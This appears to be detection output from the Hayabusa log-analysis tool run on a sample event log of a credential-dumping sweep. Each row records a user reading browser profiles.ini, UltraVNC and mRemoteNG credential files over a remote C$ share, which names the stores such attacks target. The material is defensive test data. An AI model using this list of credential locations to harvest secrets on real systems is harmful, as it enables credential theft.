2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
